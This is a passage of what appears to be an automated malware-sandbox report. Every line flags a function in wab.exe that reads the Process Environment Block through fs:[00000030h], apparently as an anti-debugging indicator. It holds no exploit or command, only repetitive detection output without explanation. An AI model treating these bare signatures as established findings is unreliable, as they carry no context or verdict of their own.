Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]	1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F2D0 mov eax, dword ptr fs:[00000030h]	1_2_02E9F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F2D0 mov eax, dword ptr fs:[00000030h]	1_2_02E9F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802A0 mov eax, dword ptr fs:[00000030h]	1_2_02E802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802A0 mov eax, dword ptr fs:[00000030h]	1_2_02E802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]	1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]	1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]	1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]	1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F072A0 mov eax, dword ptr fs:[00000030h]	1_2_02F072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F072A0 mov eax, dword ptr fs:[00000030h]	1_2_02F072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov ecx, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]	1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov eax, dword ptr fs:[00000030h]	1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov eax, dword ptr fs:[00000030h]	1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov ecx, dword ptr fs:[00000030h]	1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov ecx, dword ptr fs:[00000030h]	1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]	1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]	1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]	1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]	1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]	1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]	1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]	1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE284 mov eax, dword ptr fs:[00000030h]	1_2_02EAE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE284 mov eax, dword ptr fs:[00000030h]	1_2_02EAE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA329E mov eax, dword ptr fs:[00000030h]	1_2_02EA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA329E mov eax, dword ptr fs:[00000030h]	1_2_02EA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45283 mov eax, dword ptr fs:[00000030h]	1_2_02F45283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]	1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]	1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]	1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6826B mov eax, dword ptr fs:[00000030h]	1_2_02E6826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3D26B mov eax, dword ptr fs:[00000030h]	1_2_02F3D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3D26B mov eax, dword ptr fs:[00000030h]	1_2_02F3D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB1270 mov eax, dword ptr fs:[00000030h]	1_2_02EB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB1270 mov eax, dword ptr fs:[00000030h]	1_2_02EB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E99274 mov eax, dword ptr fs:[00000030h]	1_2_02E99274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B256 mov eax, dword ptr fs:[00000030h]	1_2_02F2B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B256 mov eax, dword ptr fs:[00000030h]	1_2_02F2B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69240 mov eax, dword ptr fs:[00000030h]	1_2_02E69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69240 mov eax, dword ptr fs:[00000030h]	1_2_02E69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA724D mov eax, dword ptr fs:[00000030h]	1_2_02EA724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A250 mov eax, dword ptr fs:[00000030h]	1_2_02E6A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76259 mov eax, dword ptr fs:[00000030h]	1_2_02E76259
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45227 mov eax, dword ptr fs:[00000030h]	1_2_02F45227
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6823B mov eax, dword ptr fs:[00000030h]	1_2_02E6823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA7208 mov eax, dword ptr fs:[00000030h]	1_2_02EA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA7208 mov eax, dword ptr fs:[00000030h]	1_2_02EA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]	1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F453FC mov eax, dword ptr fs:[00000030h]	1_2_02F453FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F3E6 mov eax, dword ptr fs:[00000030h]	1_2_02F2F3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA63FF mov eax, dword ptr fs:[00000030h]	1_2_02EA63FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B3D0 mov ecx, dword ptr fs:[00000030h]	1_2_02F2B3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]	1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]	1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]	1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]	1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C3CD mov eax, dword ptr fs:[00000030h]	1_2_02F2C3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA33A0 mov eax, dword ptr fs:[00000030h]	1_2_02EA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA33A0 mov eax, dword ptr fs:[00000030h]	1_2_02EA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E933A5 mov eax, dword ptr fs:[00000030h]	1_2_02E933A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9438F mov eax, dword ptr fs:[00000030h]	1_2_02E9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9438F mov eax, dword ptr fs:[00000030h]	1_2_02E9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4539D mov eax, dword ptr fs:[00000030h]	1_2_02F4539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]	1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]	1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]	1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]	1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]	1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]	1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A mov eax, dword ptr fs:[00000030h]	1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A mov eax, dword ptr fs:[00000030h]	1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1437C mov eax, dword ptr fs:[00000030h]	1_2_02F1437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F367 mov eax, dword ptr fs:[00000030h]	1_2_02F2F367
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]	1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]	1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]	1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3A352 mov eax, dword ptr fs:[00000030h]	1_2_02F3A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]	1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C mov eax, dword ptr fs:[00000030h]	1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C mov eax, dword ptr fs:[00000030h]	1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov ecx, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]	1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45341 mov eax, dword ptr fs:[00000030h]	1_2_02F45341
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69353 mov eax, dword ptr fs:[00000030h]	1_2_02E69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69353 mov eax, dword ptr fs:[00000030h]	1_2_02E69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F32A mov eax, dword ptr fs:[00000030h]	1_2_02E9F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E67330 mov eax, dword ptr fs:[00000030h]	1_2_02E67330
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D mov eax, dword ptr fs:[00000030h]	1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D mov eax, dword ptr fs:[00000030h]	1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]	1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]	1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]	1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]	1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]	1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]	1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C310 mov ecx, dword ptr fs:[00000030h]	1_2_02E6C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E90310 mov ecx, dword ptr fs:[00000030h]	1_2_02E90310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_02E6A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E950E4 mov eax, dword ptr fs:[00000030h]	1_2_02E950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E950E4 mov ecx, dword ptr fs:[00000030h]	1_2_02E950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E780E9 mov eax, dword ptr fs:[00000030h]	1_2_02E780E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C0F0 mov eax, dword ptr fs:[00000030h]	1_2_02E6C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB20F0 mov ecx, dword ptr fs:[00000030h]	1_2_02EB20F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F450D9 mov eax, dword ptr fs:[00000030h]	1_2_02F450D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF20DE mov eax, dword ptr fs:[00000030h]	1_2_02EF20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E990DB mov eax, dword ptr fs:[00000030h]	1_2_02E990DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F360B8 mov eax, dword ptr fs:[00000030h]	1_2_02F360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F360B8 mov ecx, dword ptr fs:[00000030h]	1_2_02F360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D08D mov eax, dword ptr fs:[00000030h]	1_2_02E6D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7208A mov eax, dword ptr fs:[00000030h]	1_2_02E7208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75096 mov eax, dword ptr fs:[00000030h]	1_2_02E75096
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA909C mov eax, dword ptr fs:[00000030h]	1_2_02EA909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D090 mov eax, dword ptr fs:[00000030h]	1_2_02E9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D090 mov eax, dword ptr fs:[00000030h]	1_2_02E9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45060 mov eax, dword ptr fs:[00000030h]	1_2_02F45060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov ecx, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]	1_2_02E81070
